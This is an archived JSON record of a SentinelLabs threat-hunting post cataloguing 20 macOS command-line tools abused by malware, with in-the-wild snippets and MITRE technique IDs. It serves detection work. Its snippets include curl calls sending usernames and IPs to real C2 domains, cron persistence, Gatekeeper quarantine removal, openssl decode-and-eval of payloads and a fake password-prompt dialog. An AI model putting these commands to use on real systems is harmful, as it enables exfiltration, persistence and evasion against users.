{
	"id": "0e2a8913-ee38-4042-93b3-4d185de8ac76",
	"created_at": "2026-04-06T00:15:18.249247Z",
	"updated_at": "2026-04-10T03:36:21.953419Z",
	"deleted_at": null,
	"sha1_hash": "7978fb2cbb4053499b33682d447b2ea44aa896d8",
	"title": "20 Common Tools \u0026 Techniques Used by macOS Threat Actors \u0026 Malware - SentinelLabs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2101257,
	"plain_text": "20 Common Tools \u0026 Techniques Used by macOS Threat Actors \u0026\r\nMalware - SentinelLabs\r\nBy Phil Stokes\r\nPublished: 2021-02-16 · Archived: 2026-04-02 10:36:59 UTC\r\nIn a recent two-part series of blog posts on Medium, Nasreddine Bencherchali took to exploring some of the\r\ncommon tools and techniques used by threat actors and malware targeting the Windows platform, with a particular\r\nfocus on LOLBins or “Living off the Land binaries”. It’s such an excellent guide for threat hunting and compiling\r\ndetection rules for Windows that we thought: “wouldn’t it be cool to have a similar guide for macOS malware?”\r\nLooking back at campaigns directly targeting the macOS platform for the last several years, we have rounded up\r\n20 of the most commonly used built-in tools (ab)used by threat actors, malware, and adware, complete with in-the-wild examples and associated MITRE behavioral indicators. We’ve also added links for each threat so that you\r\ncan follow up on further details such as IoCs, hashes and researcher analyses.\r\nchmod (/bin/chmod)\r\nChange file modes or Access Control Lists. Generally used by malware in order to give executable permissions to\r\nan executable payload retrieved remotely from a C2.\r\nCommon Arguments\r\nchmod +x\r\nchmod -R 755\r\nchmod 777\r\nITW Examples\r\nBundlore\r\nchmod -R 755 /var/folders/vq/04qz73bd7zb27d3b6r7rc6zr0000gq/T/x.mykHCy73\r\nXCSSET\r\nchmod +x\"xcassets\"\r\nShlayer\r\nchmod 777 /tmp/ZQEifWNV2l\r\nSearchMine.Adware\r\n/bin/chmod +x “${tmpFile}”\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nFile and Directory Permissions Modification T1222\r\nchown (/usr/sbin/chown)\r\nhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\r\nPage 1 of 14\n\nChange file owner and group. This utility is used by malware to change the user ID and/or the group ID of the\r\nspecified files. 
This can lock other users out of access to the file, thus hampering removal or inspection. It may\r\nalso be required in order to execute a file in certain elevated contexts.\r\nCommon Arguments\r\nchown -R \u003cuser[:group]\u003e\r\nITW Examples\r\nOSX.Dummy\r\nchown root /tmp/script.sh\r\nMMInstall\r\n/usr/sbin/chown -R root:wheel /Applications/MyCouponsmart\r\n/usr/sbin/chown -R root:wheel /Users/user/Applications/SecureMacUpdates\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nFile and Directory Permissions Modification T1222\r\ncrontab (/usr/bin/crontab)\r\nList, install and remove rules for the cron daemon. Crontab is commonly leveraged as a means to achieve\r\npersistence on macOS either in addition to or instead of installing agents and daemons via launchctl. Threat actors\r\nmay also enumerate existing crontabs in order to manipulate them.\r\nCommon Arguments\r\ncrontab -l\r\necho '\u003c*/num\u003e * * * * ' | crontab -\r\nITW Examples\r\nEmpyre\r\ncmd = 'crontab -l | { cat; echo \"0 * * * * %s\"; } | crontab -'\r\nGravityRAT\r\nsudo crontab -l 2\u003e/dev/null; echo \"*/2 * * * * s\r\nPupy RAT\r\ncat /etc/passwd | cut -d \":\" -f 1 | xargs -n1 crontab -l -u\r\nVindInstaller\r\ncrontab -l \u003e /tmp/file\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nPersistence TA0003\r\nScheduled Task/Job: Cron T1053\r\ncsrutil (/usr/bin/csrutil)\r\nRead System Integrity Protection (SIP) status. Introduced in macOS 10.11, this utility has only one publicly\r\ndocumented use, which is to return the status of the System Integrity Protection tool. 
The csrutil tool is commonly\r\nused by malware and post-exploitation tools to determine whether certain files and directories on the system are\r\nwritable or not.\r\nCommon Arguments\r\ncsrutil status\r\nITW Examples\r\nBella\r\nif systemVersion.startswith(\"10.11\") or systemVersion.startswith(\"10.12\"):\r\n csrutil = subprocess.Popen([\"csrutil status\"], stdout=subprocess.PIPE, shell=True)\r\n (out, err) = csrutil.communicate()\r\nif \"disabled\" in out:\r\nsend_msg(greenPlus + out, False)\r\nsipEnabled = False\r\nMacSearch\r\n/usr/bin/csrutil\r\nOSX.Proton.C\r\ncsrutil status\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nSystem Information Discovery T1082\r\ncurl (/usr/bin/curl)\r\nTransfer data to or from a server without user interaction. One of the most useful tools in the malware author’s\r\ntoolkit, curl is used widely in threats of all kinds, from PUPs and adware to trojans, backdoors, and APT implants,\r\nin order to download payloads, exfiltrate user data, and track campaigns via unique identifiers. 
Monitoring for\r\nmalicious use of curl is a must for all security teams.\r\nCommon Arguments\r\ncurl -k -s -L -o\r\nITW Examples\r\nOSX.GMERA\r\nreq=`curl -ks \"http://owpqkszz.info/link.php?${whoami}\u0026${ip}\"`\r\nShlayer\r\ncurl -fsL \"$url\" \u003e$tmp_path\r\nBundlore\r\ncurl -s -L -o \"${dir}/stmp.tar.gz\" \"${dlUrl}\"\r\nOSX.Mami\r\ndo curl -L -f -v --create-dirs -o '/Users/user/Library/Application Support/Cyclonica/Cyclonica'\r\nXCSSET\r\ncurl --connect-timeout 10 -sk https://flixprice.com/agent/log.php\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nCommand and Control TA0011\r\nExfiltration TA0010\r\nExfiltration Over Alternative Protocol T1048\r\ndirname (/usr/bin/dirname)\r\nReturns the filename or directory portion of a pathname. The dirname utility and its companion utility basename\r\nare both used widely by threat actors as a means of constructing installation paths and locating relative assets\r\nbased on the executing parent’s location. 
Whereas dirname returns the full path to the parent of the current\r\nworking directory, basename returns the name of the current working directory without the preceding path.\r\nCommon Arguments\r\ndirname \u003cpath\u003e\r\nbasename \u003cpath\u003e\r\nITW Examples\r\nXCSSET\r\ndirname /Users/user/Library/LaunchAgents/com.apple.core.accountsd.plist\r\nsh -c basename '/Users/user/Library/Application\r\nScripts/com.apple.AddressBook.Shared/CoreFrameworks/com.oracle.java.sound.app'\r\nOceanLotus\r\ndirname /Users/user/Downloads/ALL tim nha Chi Ngoc Canada.︀doc\r\nMMInstall\r\ndirname /Applications/MyCouponsmart/MyCouponsmart\r\nShlayer\r\nappDir=\"$(dirname $(dirname \"$currentDir\"))\"\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nFile and Directory Discovery T1083\r\nioreg (/usr/sbin/ioreg)\r\nDisplays the I/O Kit registry. This Unix binary is widely used by many malware families to determine the device’s\r\nunique ID (for campaign tracking), usually in the form of the machine’s serial number. This may or may not be\r\nhashed with another utility (e.g., md5) before being sent to the C2. 
To facilitate anti-analysis and evasion, ioreg is\r\nalso used by some threat actors to determine whether the device is running in a virtual environment.\r\nCommon Arguments\r\nioreg -c IOPlatformExpertDevice -d 2 | awk -F'\"' '/IOPlatformSerialNumber/{print $(NF-1)}'\r\nITW Examples\r\nOSX.CpuMeaner\r\nioreg -rd1 -w0 -c AppleAHCIDiskDriver | awk '/Serial Number/{gsub(\"\"\", \"\", $4);print $4}'\r\nOSX.Fruitfly\r\nioreg -l | grep -e 'VirtualBox' -e 'Oracle' -e 'VMware' -e 'Parallels' | wc -l\r\nOceanLotus\r\nioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformSerialNumber/ { split($0, line, \"\\\"\");\r\nprintf(\"%s\", line[4]); }'\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nSystem Information Discovery T1082\r\nkill (built-in), pkill (/usr/bin/pkill), killall (/usr/bin/killall)\r\nThese related commands are used to kill processes (kill, pkill) and applications (killall). Typically, malware actors\r\nuse these on macOS for evasion and anti-analysis, such as killing the Activity Monitor or the Terminal to prevent\r\nusers inspecting processes.\r\nCommon Arguments\r\nkillall\r\nkill -9\r\npkill\r\nITW Examples\r\nmacOS.OSAMiner\r\nkillall Terminal\r\nXCSSET\r\nxargs kill -9\r\nBundlore\r\npkill cfprefsd\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nImpair Defenses: Disable or Modify Tools T1562\r\nlaunchctl (/bin/launchctl)\r\nInterfaces with launchd. 
For the purposes of malware and threat actors, launchctl is a primary means of executing\r\ncommands and programs, stopping system or third-party services, and starting newly created persistence jobs\r\ninstalled as Launch Agents and Launch Daemons.\r\nCommon Arguments\r\nlaunchctl load\r\nlaunchctl unload\r\nlaunchctl stop\r\nlaunchctl start\r\nlaunchctl remove\r\nITW Examples\r\nOSX.CoinMiner\r\nlaunchctl load /Library/LaunchDaemons/com.apple.acc.installer.v1.plist\r\nLazarus Family\r\nlaunchctl load -w \"%s/Library/LaunchAgents/%s\"\r\nFinFisher/FinSpy\r\n/bin/launchctl load\r\n/bin/launchctl unload\r\nOSX.Dummy\r\nlaunchctl load -w\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nSystem Services: Launchctl T1569\r\nScheduled Task/Job: Launchd T1053\r\nCreate or Modify System Process: Launch Agent T1543.001\r\nCreate or Modify System Process: Launch Daemon T1543.004\r\nmktemp (/usr/bin/mktemp)\r\nMake a unique filename. This useful utility is widely used by malware to make random, unique file and directory\r\nnames for payloads. 
Despite the name, mktemp does not have to be used only in the /tmp directory.\r\nCommon Arguments\r\nmktemp -d\r\nmktemp -t\r\nITW Examples\r\nBundlore\r\ntmpDir=\"$(mktemp -d /tmp/XXXXXXXXXXXX)\r\nTMP_DIR=`mktemp -d -t x\r\nShlayer\r\nexport tmpDir=\"$(mktemp -d /tmp/XXXXXXXXXXXX)\"\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nHide Artifacts T1564\r\nopenssl (/usr/bin/openssl)\r\nCryptography toolkit. openssl is used widely by attackers, often in conjunction with base64, to encode and decode\r\nmalware to hide it from detection.\r\nCommon Arguments\r\nopenssl enc -aes-256-cbc -d -A -base64 -k\r\nITW Examples\r\nEvilOSX\r\nos.popen(\"openssl req -newkey rsa:4096 -nodes -x509 -days 365 -subj \"%s\" -sha256 \"\r\nMMInstall\r\n/bin/sh -c /usr/sbin/ioreg -c IOPlatformExpertDevice -d 2 | awk -F\" '/IOPlatformSerialNumber/{print\r\n$(NF-1)}' | tr -d 'n'| openssl md5\r\nShlayer\r\nopenssl enc -aes-256-cbc -salt -md md5 -d -A -base64 -out /tmp/ZQEifWNV2l -pass\r\n\"pass:0.6effariGgninthgiL0.6\"\r\nZShlayer\r\neval \"$(openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:10598344576\r\n\u003c\"$fileDir\"/Resources/talon)\"\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nDeobfuscate/Decode Files or Information T1140\r\nEncrypted Channel: Asymmetric Cryptography T1573\r\nosacompile (/usr/bin/osacompile)\r\nCompile AppleScripts from given files or standard input into a single output script. Files may be plain text or other\r\ncompiled scripts. 
Osacompile is useful to malware that wants to take advantage of AppleScript’s many powerful\r\nfeatures such as controlling other applications’ behaviour, manipulating the GUI, faking user input and phishing\r\nfor credentials.\r\nCommon Arguments\r\nosacompile -x -e\r\nosacompile -x -o\r\nITW Examples\r\nXCSSET\r\nosacompile -x -e global dFolder\r\nosacompile -x -o /Users/user/Library/Application\r\nScripts/com.apple.AddressBook.Shared/CoreFrameworks/com.apple.core.okcx.app\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nObfuscated Files or Information: Compile After Delivery T1027\r\nosascript (/usr/bin/osascript)\r\nExecutes a given AppleScript, which may be plain text or a compiled script (.scpt). Scripts can also be specified\r\nline by line using -e switches on the command line, a technique popular among adware and browser\r\nmanipulating malware. Although AppleScripts can be executed in other ways, osascript is still the most common\r\nmethod used by threat actors. It is also a particular favorite of various open source post-exploitation and RAT\r\ntools.\r\nCommon Arguments\r\nosascript -e\r\nITW Examples\r\nEvilOSX\r\nosascript -e 'tell app \"iTunes\" to activate' -e 'tell app \"iTunes\" to display dialog \"Error\r\nconnecting to iTunes. Please verify your password”\r\nPupy RAT\r\ncmd = 'osascript -e 'tell app \"Finder\" to display dialog \"%s\"'' % args.text\r\nEggShell\r\ncmd_data[\"args\"] = \" -e 'tell application \"Finder\" to sleep'\"\r\nElite Keylogger\r\n/usr/bin/osascript\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nCommand and Scripting Interpreter: AppleScript T1059\r\nps (/bin/ps)\r\nDisplay information about running processes. 
The process status (ps) command is to macOS (and Linux) what\r\nTasklist is to Windows: an adversary’s primary means of understanding the device’s current execution\r\nenvironment. Aside from simply enumerating running processes, ps can be used to check on a given process’\r\nstart time, elapsed time, resource usage and the login name of the user who started it (among other things).\r\nCommon Arguments\r\nps ax\r\nps -p -o etime=\r\nITW Examples\r\nmacOS.OSAMiner\r\nps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print\r\n$1}'\r\nOSX.Fruitfly\r\nps -eAo pid,thcount,ppid,nice,user,command 2\u003e/dev/null\r\nPirrit\r\nif ps -ef | grep -v grep | grep -q $frm; then\r\nBella\r\ncheck_output('ps -p %s -o etime=' % bellaPID)\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nProcess Discovery T1057\r\nsw_vers (/usr/bin/sw_vers)\r\nPrint operating system version information. 
It is common for malware to determine the macOS version of the\r\ntarget machine both to discover what APIs are available so that the correct payload can be installed and to\r\nascertain what system defences or mitigations may be in place (e.g., System Integrity Protection, User Data\r\nProtections like Full Disk Access).\r\nCommon Arguments\r\nsw_vers\r\nsw_vers -productName\r\nsw_vers -productVersion\r\nsw_vers -buildVersion\r\nITW Examples\r\nBundlore\r\n/usr/bin/sw_vers -productVersion\r\nGravityRAT\r\nosinfo = os.popen('sw_vers -productName').read().strip() + '-' + os.popen('sw_vers -productVersion')\r\nLazarus/NukeSped\r\nsw_vers -productName\r\nsw_vers -productVersion\r\nsw_vers -buildVersion\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nSystem Information Discovery T1082\r\nsysctl (/usr/sbin/sysctl)\r\nRetrieve kernel state and allow apps with appropriate privileges to set kernel state. Used by malware as a means of\r\ndetermining whether the execution parent is within a sandbox or virtual machine. The utility can also be used to\r\ndetermine, among other things, the amount of installed memory on the infected device.\r\nCommon Arguments\r\nsysctl -n hw.model\r\nITW Examples\r\nBella\r\nsysctl -n machdep.cpu.brand_string; hostinfo | grep memory;\r\nEvilOSX\r\nmodel_key = run_command(\"sysctl -n hw.model\")\r\nGenieo\r\n/usr/sbin/sysctl\r\nhw.optional.x86_64\r\nhw.cpu64bit_capable\r\nOceanLotus\r\nsysctl hw.model\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nVirtualization/Sandbox Evasion T1497\r\nSystem Information Discovery T1082\r\nsystem_profiler (/usr/sbin/system_profiler)\r\nReports system hardware and software configuration. 
This built-in utility is a command line version of the System\r\nInformation.app (/Applications/Utilities/System Information.app) and is a mainstay of all types of malware,\r\nspyware, post-exploitation tools, adware, and PUPs. Because of its deep insight into the entire environment, it can\r\nbe used for a variety of purposes relating to environment discovery, detection evasion and anti-analysis.\r\nCommon Arguments\r\nsystem_profiler SPHardwareDataType\r\nsystem_profiler SPUSBDataType\r\nsystem_profiler SPNetworkDataType\r\nITW Examples\r\nBundlore\r\n/usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full\r\nEmpyre\r\nprocess = subprocess.Popen(\"system_profiler SPHardwareDataType\", stdout=subprocess.PIPE, shell=True)\r\nFinFisher/FinSpy\r\nsystem_profiler SPUSBDataType | egrep -i \"Manufacturer: (parallels|vmware|virtualbox)\"\r\nSearchPageInstaller\r\nsystem_profiler SPNetworkDataType | grep ‘Proxy Enabled’\r\nAMC.PUA, Genieo\r\n/usr/sbin/system_profiler SPHardwareDataType\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nSystem Information Discovery T1082\r\nVirtualization/Sandbox Evasion T1497\r\ntouch (/usr/bin/touch)\r\nThe touch utility sets the modification and access times of files. If any file does not exist, it is created with default\r\npermissions. 
This makes the utility useful to malware in two common scenarios: for creating an empty file at a\r\ngiven path that is later passed data, and/or for changing the timestamp on a file as a means of evasion, also known\r\nas “timestomping”.\r\nCommon Arguments\r\ntouch\r\ntouch -t\r\nITW Examples\r\nOceanLotus\r\ntouch -t 1401140507 /Users/user/Library/User Photos/mount_devfs\r\nPirrit\r\ntouch /Applications/.UpdatesMac15\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nIndicator Removal on Host: Timestomp T1070\r\nMasquerading T1036\r\nwhoami (/usr/bin/whoami)\r\nDisplay effective user id. Although this utility has been replaced by the more versatile id utility, it is still widely\r\nused by malware to retrieve the current user’s name. The whoami command is effectively a synonym for id -un.\r\nCommon Arguments\r\nwhoami\r\nITW Examples\r\nEggShell\r\necho '%@' | sudo -S whoami\r\nwhoami\r\nLazarus\r\nwhoami\r\nPupy RAT\r\nusername=`whoami`\r\nOSX.GMERA\r\nwhoami=\"$(remove_spec_char `whoami`)\"\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nSystem Owner/User Discovery T1033\r\nxattr (/usr/bin/xattr)\r\nDisplay and manipulate extended attributes. Used by malware and threat actors as a means to bypass Gatekeeper\r\nand Notarization checks on macOS. 
Incredibly, any process or user can remove the file attribute that is required\r\nfor these checks to proceed without admin rights.\r\nCommon Arguments\r\nxattr -d com.apple.quarantine\r\nxattr -c\r\nxattr -cr\r\nITW Examples\r\nOceanLotus\r\nfind /Users/user -name *ALL tim nha Chi Ngoc Canada* -exec xattr -d com.apple.quarantine {} +\r\nXCSSET\r\n/bin/bash -c xattr -cr '/Applications/Google Chrome.app'\r\nAssociated MITRE Techniques\r\nThe following techniques from MITRE ATT\u0026CK are associated with this tool:\r\nBypass or Subvert Trust Controls T1553\r\nConclusion\r\nMany threat actors and malware samples use the same tools on macOS, so monitoring or searching for anomalous\r\nuse of these tools can help your incident response, threat hunting and blue team efforts. For more in-depth\r\ninformation on macOS threat hunting, grab the free SentinelLabs Guide to macOS Threat Hunting \u0026 Incident\r\nResponse ebook.\r\nSource: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"
	],
	"report_names": [
		"20-common-tools-techniques-used-by-macos-threat-actors-malware"
	],
	"threat_actors": [
		{
			"id": "af509bbb-8d18-4903-a9bd-9e94099c6b30",
			"created_at": "2023-01-06T13:46:38.585525Z",
			"updated_at": "2026-04-10T02:00:03.030833Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"OceanLotus",
				"ATK17",
				"G0050",
				"APT-C-00",
				"APT-32",
				"Canvas Cyclone",
				"SeaLotus",
				"Ocean Buffalo",
				"OceanLotus Group",
				"Cobalt Kitty",
				"Sea Lotus",
				"APT 32",
				"POND LOACH",
				"TIN WOODLAWN",
				"Ocean Lotus"
			],
			"source_name": "MISPGALAXY:APT32",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "870f6f62-84f5-48ca-a18e-cf2902cd6924",
			"created_at": "2022-10-25T15:50:23.303818Z",
			"updated_at": "2026-04-10T02:00:05.301184Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"APT32",
				"SeaLotus",
				"OceanLotus",
				"APT-C-00",
				"Canvas Cyclone"
			],
			"source_name": "MITRE:APT32",
			"tools": [
				"Mimikatz",
				"ipconfig",
				"Kerrdown",
				"Cobalt Strike",
				"SOUNDBITE",
				"OSX_OCEANLOTUS.D",
				"KOMPROGO",
				"netsh",
				"RotaJakiro",
				"PHOREAL",
				"Arp",
				"Denis",
				"Goopy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5da6b5fd-1955-412a-81aa-069fb50b6e31",
			"created_at": "2025-08-07T02:03:25.116085Z",
			"updated_at": "2026-04-10T02:00:03.668978Z",
			"deleted_at": null,
			"main_name": "TIN WOODLAWN",
			"aliases": [
				"APT32 ",
				"Cobalt Kitty",
				"OceanLotus",
				"WOODLAWN "
			],
			"source_name": "Secureworks:TIN WOODLAWN",
			"tools": [
				"Cobalt Strike",
				"Denis",
				"Goopy",
				"JEShell",
				"KerrDown",
				"Mimikatz",
				"Ratsnif",
				"Remy",
				"Rizzo",
				"RolandRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2439ad53-39cc-4fff-8fdf-4028d65803c0",
			"created_at": "2022-10-25T16:07:23.353204Z",
			"updated_at": "2026-04-10T02:00:04.55407Z",
			"deleted_at": null,
			"main_name": "APT 32",
			"aliases": [
				"APT 32",
				"APT-C-00",
				"APT-LY-100",
				"ATK 17",
				"G0050",
				"Lotus Bane",
				"Ocean Buffalo",
				"OceanLotus",
				"Operation Cobalt Kitty",
				"Operation PhantomLance",
				"Pond Loach",
				"SeaLotus",
				"SectorF01",
				"Tin Woodlawn"
			],
			"source_name": "ETDA:APT 32",
			"tools": [
				"Agentemis",
				"Android.Backdoor.736.origin",
				"AtNow",
				"Backdoor.MacOS.OCEANLOTUS.F",
				"BadCake",
				"CACTUSTORCH",
				"CamCapture Plugin",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"Cuegoe",
				"DKMC",
				"Denis",
				"Goopy",
				"HiddenLotus",
				"KOMPROGO",
				"KerrDown",
				"METALJACK",
				"MSFvenom",
				"Mimikatz",
				"Nishang",
				"OSX_OCEANLOTUS.D",
				"OceanLotus",
				"PHOREAL",
				"PWNDROID1",
				"PhantomLance",
				"PowerSploit",
				"Quasar RAT",
				"QuasarRAT",
				"RatSnif",
				"Remy",
				"Remy RAT",
				"Rizzo",
				"Roland",
				"Roland RAT",
				"SOUNDBITE",
				"Salgorea",
				"Splinter RAT",
				"Terracotta VPN",
				"Yggdrasil",
				"cobeacon",
				"denesRAT",
				"fingerprintjs2"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434518,
	"ts_updated_at": 1775792181,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7978fb2cbb4053499b33682d447b2ea44aa896d8.pdf",
		"text": "https://archive.orkl.eu/7978fb2cbb4053499b33682d447b2ea44aa896d8.txt",
		"img": "https://archive.orkl.eu/7978fb2cbb4053499b33682d447b2ea44aa896d8.jpg"
	}
}